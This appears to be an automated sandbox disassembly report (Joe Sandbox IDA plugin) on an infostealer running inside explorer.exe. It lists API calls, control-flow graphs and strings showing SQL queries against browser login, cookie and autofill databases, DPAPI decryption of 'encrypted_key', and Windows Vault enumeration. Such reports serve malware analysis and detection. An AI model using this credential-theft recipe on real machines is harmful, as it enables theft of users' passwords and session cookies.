                                                                                  • DeleteFileW.KERNELBASE(00000000), ref: 001235A5
                                                                                  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001235B0
                                                                                  • RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 00123649
                                                                                  • RtlZeroMemory.NTDLL(?,00000040), ref: 0012367E
                                                                                  • lstrlen.KERNEL32(?,?,?,?,?), ref: 00123799
                                                                                  • lstrlen.KERNEL32(00000000), ref: 001237A8
                                                                                  • wsprintfA.USER32 ref: 001237FF
                                                                                  • lstrlen.KERNEL32(00000000,?,?), ref: 0012380B
                                                                                  • lstrcat.KERNEL32(00000000,?), ref: 0012382F
                                                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00123857
                                                                                  • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00123921
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00123930
                                                                                  • wsprintfA.USER32 ref: 00123987
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00123993
                                                                                  • lstrcat.KERNEL32(00000000,?), ref: 001239B7
                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 001239E8
                                                                                  • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00123A24
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                                  • String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
                                                                                  • API String ID: 584740257-404540950
                                                                                  • Opcode ID: ebaffb80dd9eb1c498f97ed15513f823583cc9e462a1d9057aa60cdfbc98cc82
                                                                                  • Instruction ID: 3453d56893b7e846fc2b69d4cda2e1dca42ebd7492d789ea5c412282b9a25914
                                                                                  • Opcode Fuzzy Hash: ebaffb80dd9eb1c498f97ed15513f823583cc9e462a1d9057aa60cdfbc98cc82
                                                                                  • Instruction Fuzzy Hash: CAE1B970208351AFDB15DF24E884A6FBBF9AF84744F04482CF5958B2A1DB78CA95CB52
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 131 122308-122339 RtlZeroMemory GetVersionExW 132 122347-12234c 131->132 133 12233b-122340 131->133 135 12234e 132->135 136 122353-122366 LoadLibraryW 132->136 134 122342 133->134 133->135 134->132 135->136 137 12260b-122613 136->137 138 12236c-1223ae GetProcAddress * 5 136->138 139 122602-12260a FreeLibrary 138->139 140 1223b4-1223ba 138->140 139->137 140->139 141 1223c0-1223c2 140->141 141->139 142 1223c8-1223ca 141->142 142->139 143 1223d0-1223d5 142->143 143->139 144 1223db-1223f0 143->144 144->139 146 1223f6-122415 144->146 148 1225fb-1225ff 146->148 149 12241b-122423 146->149 148->139 150 1225f3 149->150 151 122429-122435 149->151 150->148 152 122439-12244b 151->152 153 122451-122461 RtlCompareMemory 152->153 154 1224d5-1224e5 RtlCompareMemory 152->154 155 1225c2-1225e5 153->155 157 122467-1224b8 call 121b1b * 3 153->157 154->155 156 1224eb-122539 call 121b1b * 3 154->156 155->152 160 1225eb-1225ef 155->160 173 122554-12255a 156->173 174 12253b-12254c call 121b1b 156->174 157->173 175 1224be-1224d3 call 121b1b 157->175 160->150 178 1225a1-1225a3 173->178 179 12255c-12255e 173->179 190 122550 174->190 175->190 183 1225a5-1225a7 call 121011 178->183 184 1225ac-1225ae 178->184 180 122560-122562 179->180 181 12259a-12259c call 121011 179->181 180->181 188 122564-122566 180->188 181->178 183->184 186 1225b0-1225b2 call 121011 184->186 187 1225b7-1225b9 184->187 186->187 187->155 194 1225bb-1225bd call 121011 187->194 188->181 193 122568-122576 StrStrIW 188->193 190->173 195 122596 193->195 196 122578-122591 call 121988 * 3 193->196 194->155 195->181 196->195
                                                                                  APIs
                                                                                  • RtlZeroMemory.NTDLL(?,00000114), ref: 0012231F
                                                                                  • GetVersionExW.KERNEL32(?), ref: 0012232E
                                                                                  • LoadLibraryW.KERNEL32(vaultcli.dll), ref: 00122358
                                                                                  • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 0012237A
                                                                                  • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 00122384
                                                                                  • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 00122390
                                                                                  • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0012239A
                                                                                  • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 001223A6
                                                                                  • RtlCompareMemory.NTDLL(?,00181110,00000010), ref: 00122458
                                                                                  • RtlCompareMemory.NTDLL(?,00181110,00000010), ref: 001224DC
                                                                                    • Part of subcall function 00121B1B: lstrlenW.KERNEL32(?,00000000,00000000,?,?,0012307C), ref: 00121B3B
                                                                                    • Part of subcall function 00121B1B: lstrlenW.KERNEL32(00176574,?,?,0012307C), ref: 00121B40
                                                                                    • Part of subcall function 00121B1B: lstrcatW.KERNEL32(00000000,?), ref: 00121B58
                                                                                    • Part of subcall function 00121B1B: lstrcatW.KERNEL32(00000000,00176574), ref: 00121B5C
                                                                                  • StrStrIW.SHLWAPI(?,Internet Explorer), ref: 0012256E
                                                                                  • FreeLibrary.KERNELBASE(00000000), ref: 00122603
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
                                                                                  • String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                                                  • API String ID: 2583887280-2831467701
                                                                                  • Opcode ID: 56815cabfb96934d02da438afb5204feb2040d7a170e8344ea16665f1e23019e
                                                                                  • Instruction ID: 05ed6441fe306e0afec0340698860f6a899e203c0c4ca2bc405321f0243bb7e2
                                                                                  • Opcode Fuzzy Hash: 56815cabfb96934d02da438afb5204feb2040d7a170e8344ea16665f1e23019e
                                                                                  • Instruction Fuzzy Hash: 10918671A08310AFD718DF25E894A6FBBF9BFA8304F00882DF88587251EB74D8518B52
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 258 123208-123221 call 121d32 261 123227-12323d 258->261 262 12352a-123530 258->262 263 123253-123298 call 121000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW call 1749fa 261->263 264 12323f-123248 call 12319d 261->264 271 12350b-123514 DeleteFileW call 121011 263->271 272 12329e-1232b6 call 15ecc6 263->272 267 12324d-12324f 264->267 267->263 276 123519-12351b 271->276 277 123502-123506 call 173656 272->277 278 1232bc-1232c8 call 1400fa 272->278 276->262 279 12351d-123525 call 12316a 276->279 277->271 284 1234f9-1234fd call 13f9a0 278->284 285 1232ce-1232d1 278->285 279->262 284->277 287 1232d5-1232ef call 122117 285->287 290 1232f5-123306 287->290 291 1234df-1234eb call 1400fa 287->291 293 12330c-12331c RtlCompareMemory 290->293 294 12343d-123457 CryptUnprotectData 290->294 291->287 298 1234f1-1234f5 291->298 293->294 297 123322-123324 293->297 294->291 296 12345d-123462 294->296 296->291 299 123464-12347a call 122117 296->299 297->294 300 12332a-12332f 297->300 298->284 306 123488-12349f call 122117 299->306 307 12347c-123482 299->307 300->294 302 123335-12333a 300->302 302->294 303 123340-1233c3 RtlZeroMemory call 121000 302->303 315 1233c5-1233db call 122117 303->315 316 12342d 303->316 313 1234a1-1234a7 306->313 314 1234ad-1234b3 306->314 307->306 308 123484 307->308 308->306 313->314 317 1234a9 313->317 318 1234c1-1234da call 121960 * 3 314->318 319 1234b5-1234bb 314->319 327 1233e9-1233fe call 122117 315->327 328 1233dd-1233e3 315->328 321 123431-123438 call 121011 316->321 317->314 318->291 319->318 322 1234bd 319->322 321->291 322->318 336 123400-123406 327->336 337 12340c-12342b call 121960 * 3 327->337 328->327 331 1233e5 328->331 331->327 336->337 339 123408 336->339 337->321 339->337
                                                                                  APIs
                                                                                    • Part of subcall function 00121D32: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00121D4A
                                                                                    • Part of subcall function 00121D32: CloseHandle.KERNEL32(00000000), ref: 00121D57
                                                                                  • GetTempPathW.KERNEL32(00000104,00000000), ref: 00123269
                                                                                  • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00123273
                                                                                  • DeleteFileW.KERNELBASE(00000000), ref: 0012327A
                                                                                  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 00123285
                                                                                  • RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 00123314
                                                                                  • RtlZeroMemory.NTDLL(?,00000040), ref: 00123347
                                                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0012344F
                                                                                  • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 0012350C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                                  • String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
                                                                                  • API String ID: 2757140130-4052020286
                                                                                  • Opcode ID: 21ebb7539dac467e437e3dbb53de7bc41059688e6982212582f2ad8d5b8fd8b7
                                                                                  • Instruction ID: e1c9ebc2aec4914a3ce90ff00b66c2986c4e78f3ced2769194dfc5dfcb669c5a
                                                                                  • Opcode Fuzzy Hash: 21ebb7539dac467e437e3dbb53de7bc41059688e6982212582f2ad8d5b8fd8b7
                                                                                  • Instruction Fuzzy Hash: CB91C870208391AFD711EF20E884A6FBBE9AFD5744F04092DF595932A0DB38DE55CB22
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 345 123ce7-123cf5 346 123cfb-123cff 345->346 347 123ddf-123de9 345->347 346->347 348 123d05-123d2f call 121000 PathCombineW FindFirstFileW 346->348 351 123d35-123d3e 348->351 352 123dd8-123dda call 121011 348->352 353 123d40-123d4e lstrcmpiW 351->353 354 123d86-123d94 lstrcmpiW 351->354 352->347 357 123dbd-123dcb FindNextFileW 353->357 358 123d50-123d62 lstrcmpiW 353->358 356 123d96-123db1 call 121000 PathCombineW call 123c12 354->356 354->357 367 123db6-123db8 call 121011 356->367 357->351 361 123dd1-123dd2 FindClose 357->361 358->357 359 123d64-123d84 call 121000 PathCombineW call 123ce7 358->359 359->367 361->352 367->357
                                                                                  APIs
                                                                                    • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,00121215,?,?,00000001,00000000,?), ref: 00121003
                                                                                    • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                  • PathCombineW.SHLWAPI(00000000,00000000,*.*), ref: 00123D18
                                                                                  • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 00123D24
                                                                                  • lstrcmpiW.KERNEL32(?,001762BC), ref: 00123D46
                                                                                  • lstrcmpiW.KERNEL32(?,001762C0), ref: 00123D5A
                                                                                  • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00123D77
                                                                                  • lstrcmpiW.KERNEL32(?,Local State), ref: 00123D8C
                                                                                  • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00123DA9
                                                                                  • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00123DC3
                                                                                  • FindClose.KERNELBASE(00000000), ref: 00123DD2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
                                                                                  • String ID: *.*$Local State
                                                                                  • API String ID: 3923353463-3324723383
                                                                                  • Opcode ID: 54d2759f3d409b373dee79c0711a0490188487d2cf270dc729b625338f0d3816
                                                                                  • Instruction ID: 2fd9543c60b355b1dcedbad2ef4a437e6b46c347ff496194f86c4e758c70a4e4
                                                                                  • Opcode Fuzzy Hash: 54d2759f3d409b373dee79c0711a0490188487d2cf270dc729b625338f0d3816
                                                                                  • Instruction Fuzzy Hash: 4521C2312007696BD714ABB0AC4CE6F36BCEF91751B440529F92AC2192EB3C8AD88661
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 457 121eba-121ecc 458 121ed2-121ed6 457->458 459 122024-12202e 457->459 458->459 460 121edc-121ee7 call 121b7c 458->460 463 121efb-121f07 call 121b1b 460->463 464 121ee9-121ef9 call 121b1b 460->464 469 121f0b-121f0d 463->469 464->469 469->459 470 121f13-121f24 FindFirstFileW 469->470 471 121f2a 470->471 472 12201d-12201f call 121011 470->472 474 121f2e-121f33 471->474 472->459 475 121f35-121f47 lstrcmpiW 474->475 476 121fad-121fda call 121b1b call 121b65 lstrcmpiW 474->476 478 121ffe-12200c FindNextFileW 475->478 479 121f4d-121f5f lstrcmpiW 475->479 489 121ff7-121ff9 call 121011 476->489 490 121fdc-121fe5 call 121e67 476->490 478->474 480 122012-122019 FindClose 478->480 479->478 482 121f65-121f70 call 121b7c 479->482 480->472 487 121f72-121f77 482->487 488 121f79 482->488 492 121f7b-121fab call 121b1b call 121b65 call 121eba 487->492 488->492 489->478 490->489 496 121fe7-121fef 490->496 492->489 496->489
                                                                                  APIs
                                                                                    • Part of subcall function 00121B7C: lstrlenW.KERNEL32(00000000,00000000,00000000,00122E1F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 00121B8C
                                                                                  • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 00121F19
                                                                                  • lstrcmpiW.KERNEL32(?,001762BC), ref: 00121F3F
                                                                                  • lstrcmpiW.KERNEL32(?,001762C0), ref: 00121F57
                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00121FD2
                                                                                    • Part of subcall function 00121E67: lstrlenW.KERNEL32(00000000,00000000,00000000,00122D97), ref: 00121E72
                                                                                    • Part of subcall function 00121E67: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 00121E7D
                                                                                  • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00122004
                                                                                  • FindClose.KERNELBASE(00000000), ref: 00122013
                                                                                    • Part of subcall function 00121B1B: lstrlenW.KERNEL32(?,00000000,00000000,?,?,0012307C), ref: 00121B3B
                                                                                    • Part of subcall function 00121B1B: lstrlenW.KERNEL32(00176574,?,?,0012307C), ref: 00121B40
                                                                                    • Part of subcall function 00121B1B: lstrcatW.KERNEL32(00000000,?), ref: 00121B58
                                                                                    • Part of subcall function 00121B1B: lstrcatW.KERNEL32(00000000,00176574), ref: 00121B5C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
                                                                                  • String ID: *.*$\*.*
                                                                                  • API String ID: 232625764-1692270452
                                                                                  • Opcode ID: e557d5e45498d7e0a165895ffc0e680c5a20453e5766411a6205f89510635ae2
                                                                                  • Instruction ID: 28ab72f8e3d19d21b3f524473dc5aabb6df3061527beae860cd20b3b7310c8ef
                                                                                  • Opcode Fuzzy Hash: e557d5e45498d7e0a165895ffc0e680c5a20453e5766411a6205f89510635ae2
                                                                                  • Instruction Fuzzy Hash: 58310830304761ABCB24EB34A988A6F76FAAFE5340F000A2DF959C3251FB35CC699651
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 502 123c12-123c1f call 121d32 505 123ce2-123ce6 502->505 506 123c25-123c30 call 121df9 502->506 506->505 509 123c36-123c42 call 123121 506->509 512 123cd6-123cda 509->512 513 123c48-123c5d call 121289 509->513 512->505 516 123cce-123cd5 call 121011 513->516 517 123c5f-123c66 513->517 516->512 518 123c68-123c78 517->518 519 123ccd 517->519 521 123cc6-123cc8 call 121011 518->521 522 123c7a-123c8a RtlCompareMemory 518->522 519->516 521->519 522->521 524 123c8c-123cb4 CryptUnprotectData 522->524 524->521 526 123cb6-123cbb 524->526 526->521 527 123cbd-123cc1 526->527 527->521
                                                                                  APIs
                                                                                    • Part of subcall function 00121D32: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00121D4A
                                                                                    • Part of subcall function 00121D32: CloseHandle.KERNEL32(00000000), ref: 00121D57
                                                                                    • Part of subcall function 00121DF9: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00121E0E
                                                                                    • Part of subcall function 00121DF9: GetFileSize.KERNEL32(00000000,00000000,00000000,?,00123DB6), ref: 00121E1E
                                                                                    • Part of subcall function 00121DF9: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00121E3E
                                                                                    • Part of subcall function 00121DF9: CloseHandle.KERNEL32(00000000), ref: 00121E59
                                                                                    • Part of subcall function 00123121: StrStrIA.SHLWAPI(00000000,"encrypted_key":"), ref: 00123131
                                                                                    • Part of subcall function 00123121: lstrlen.KERNEL32("encrypted_key":",?,00123DB6), ref: 0012313E
                                                                                    • Part of subcall function 00123121: StrStrIA.SHLWAPI("encrypted_key":",0017693C), ref: 0012314D
                                                                                    • Part of subcall function 00121289: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00123C59,00000000), ref: 00121298
                                                                                    • Part of subcall function 00121289: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 001212B6
                                                                                    • Part of subcall function 00121289: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 001212E3
                                                                                  • RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 00123C82
                                                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00123CAC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
                                                                                  • String ID: $DPAP$DPAP$IDPAP
                                                                                  • API String ID: 3076719866-957854035
                                                                                  • Opcode ID: 00e9be802dc12243008fd3e0138f15ba68d69a429a54ef64a312703d6b9d04b1
                                                                                  • Instruction ID: 64623e578c470c161025b2c1163fa6c72696b7c4525e2f6500867a4c37edf879
                                                                                  • Opcode Fuzzy Hash: 00e9be802dc12243008fd3e0138f15ba68d69a429a54ef64a312703d6b9d04b1
                                                                                  • Instruction Fuzzy Hash: 2821A171604365ABD710EF68AD80A7FB6DDAF94700F44092EF851D7241EB78CE6487A2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 001211B0: VirtualQuery.KERNEL32(?,?,0000001C), ref: 001211BD
                                                                                  • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 001249C4
                                                                                  • NtUnmapViewOfSection.NTDLL(000000FF), ref: 001249CD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 1675517319-0
                                                                                  • Opcode ID: 357435fae4981bdd63880084902dfa13313129334141a0062cd2b2b6be6fbbf6
                                                                                  • Instruction ID: 3b3324798bda53d189566ad06b14d6309bc8f2d2f13d2a7752f0e3c127dbda6e
                                                                                  • Opcode Fuzzy Hash: 357435fae4981bdd63880084902dfa13313129334141a0062cd2b2b6be6fbbf6
                                                                                  • Instruction Fuzzy Hash: 34E04832504230BBCE54B774FD0A95B3BACAFA9365F118615B25582491CB3549E4CB51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 001211B0: VirtualQuery.KERNEL32(?,?,0000001C), ref: 001211BD
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00121C5A,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00121CAA), ref: 00121020
                                                                                  • HeapFree.KERNEL32(00000000), ref: 00121027
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$FreeProcessQueryVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2580854192-0
                                                                                  • Opcode ID: 8bcbc70eca245409756be80af8cf0e074c33bfac9a0bccf21d00631f52a2204b
                                                                                  • Instruction ID: 19a57eb4f764e419e2d0a285fb945a55522f9e82601e34c6ab51cbf3ae6dfb65
                                                                                  • Opcode Fuzzy Hash: 8bcbc70eca245409756be80af8cf0e074c33bfac9a0bccf21d00631f52a2204b
                                                                                  • Instruction Fuzzy Hash: E0C04C7140563066CA6067747D0DBCA2B28AF5A352F450542B60997552DF6A8CD186A0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetSystemInfo.KERNELBASE(001820A4,00000001,00000000,0000000A,00172F35,00122A4A,00000000,?), ref: 0012BE0A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoSystem
                                                                                  • String ID:
                                                                                  • API String ID: 31276548-0
                                                                                  • Opcode ID: 7c629a8d01a223269415cfa4738866a1dc916aac974b8dcf83563b892a84b0f5
                                                                                  • Instruction ID: 90b6493a9a8d4a21af2e68a865935b47dff41b329393c1f32348049b2212de48
                                                                                  • Opcode Fuzzy Hash: 7c629a8d01a223269415cfa4738866a1dc916aac974b8dcf83563b892a84b0f5
                                                                                  • Instruction Fuzzy Hash: B7E0DF323CC32072F610B2FA7D17F8A0248BBE0F00F204920B20BE90CACFE585620726
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 00121D32: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00121D4A
                                                                                    • Part of subcall function 00121D32: CloseHandle.KERNEL32(00000000), ref: 00121D57
                                                                                    • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,00121215,?,?,00000001,00000000,?), ref: 00121003
                                                                                    • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                  • GetTempPathW.KERNEL32(00000104,00000000), ref: 00123A78
                                                                                  • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00123A84
                                                                                  • DeleteFileW.KERNEL32(00000000), ref: 00123A8B
                                                                                  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 00123A97
                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 00123B3D
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00123B44
                                                                                  • wsprintfA.USER32 ref: 00123B63
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00123B6F
                                                                                  • lstrcat.KERNEL32(00000000,?), ref: 00123B97
                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00123BC0
                                                                                  • DeleteFileW.KERNEL32(00000000,00000000,?), ref: 00123BFB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
                                                                                  • String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
                                                                                  • API String ID: 2923052733-3488123210
                                                                                  • Opcode ID: 3978a98f32fae6a400af090242eb5181b359eaad17d302996c06fc445fb06caa
                                                                                  • Instruction ID: 575eb36e46f6a0e51597e0feee7a714c96922716be31e756ac1e5d427e7a1d1d
                                                                                  • Opcode Fuzzy Hash: 3978a98f32fae6a400af090242eb5181b359eaad17d302996c06fc445fb06caa
                                                                                  • Instruction Fuzzy Hash: D841A030204261ABD711EF34EC91E3F76A9EFA5744F00482CF856A3252DB39DD568B62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 370 121438-121493 call 121410 call 121000 call 12106c call 1212f1 379 121495-1214ac 370->379 380 1214ae-1214b1 370->380 383 1214be-1214c0 379->383 382 1214b8-1214ba 380->382 382->383 384 121793-1217a2 call 121011 383->384 385 1214c6-1214fd RtlZeroMemory 383->385 389 121503-12151e 385->389 390 12178b-121792 385->390 391 121550-121559 389->391 392 121520-121531 call 121381 389->392 390->384 396 121560-121562 391->396 397 121533-121542 392->397 398 121544 392->398 399 121566-121568 396->399 400 121546-12154e 397->400 398->400 401 121778-12177e 399->401 402 12156e-1215aa call 1210b1 399->402 400->399 404 121780-121782 call 121011 401->404 405 121787 401->405 409 1215b1-1215c9 402->409 410 1215ac 402->410 404->405 405->390 412 121771 409->412 413 1215cf-1215d4 409->413 410->409 412->401 414 1215d6-1215e7 413->414 415 1215ee-12161c call 121000 wsprintfW 413->415 414->415 418 121635-12164c 415->418 419 12161e-121620 415->419 424 12168b-1216a5 418->424 425 12164e-121684 call 121000 wsprintfW 418->425 420 121621-121624 419->420 422 121626-12162b 420->422 423 12162f-121631 420->423 422->420 426 12162d 422->426 423->418 430 1216ab-1216be 424->430 431 12174e-121764 call 121011 424->431 425->424 426->418 430->431 435 1216c4-1216da call 121000 430->435 438 121766-121768 call 121011 431->438 439 12176d 431->439 442 1216dc-1216e7 435->442 438->439 439->412 443 1216fb-121712 442->443 444 1216e9-1216f6 call 12102f 442->444 448 121716-121723 443->448 449 121714 443->449 444->443 448->442 450 121725-121729 448->450 449->448 451 121743-12174a call 121011 450->451 452 12172b call 12104c 450->452 451->431 455 121730-12173d RtlMoveMemory 452->455 455->451
                                                                                  APIs
                                                                                    • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,00121215,?,?,00000001,00000000,?), ref: 00121003
                                                                                    • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                    • Part of subcall function 0012106C: lstrlen.KERNEL32(00ACBC76,00000000,00000000,00000000,00121474,75572B62,00ACBC76,00000000), ref: 00121074
                                                                                    • Part of subcall function 0012106C: MultiByteToWideChar.KERNEL32(00000000,00000000,00ACBC76,00000001,00000000,00000000), ref: 00121086
                                                                                    • Part of subcall function 001212F1: RtlZeroMemory.NTDLL(?,00000018), ref: 00121303
                                                                                  • RtlZeroMemory.NTDLL(?,0000003C), ref: 001214D0
                                                                                  • wsprintfW.USER32 ref: 00121608
                                                                                  • wsprintfW.USER32 ref: 00121673
                                                                                  • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 0012173D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
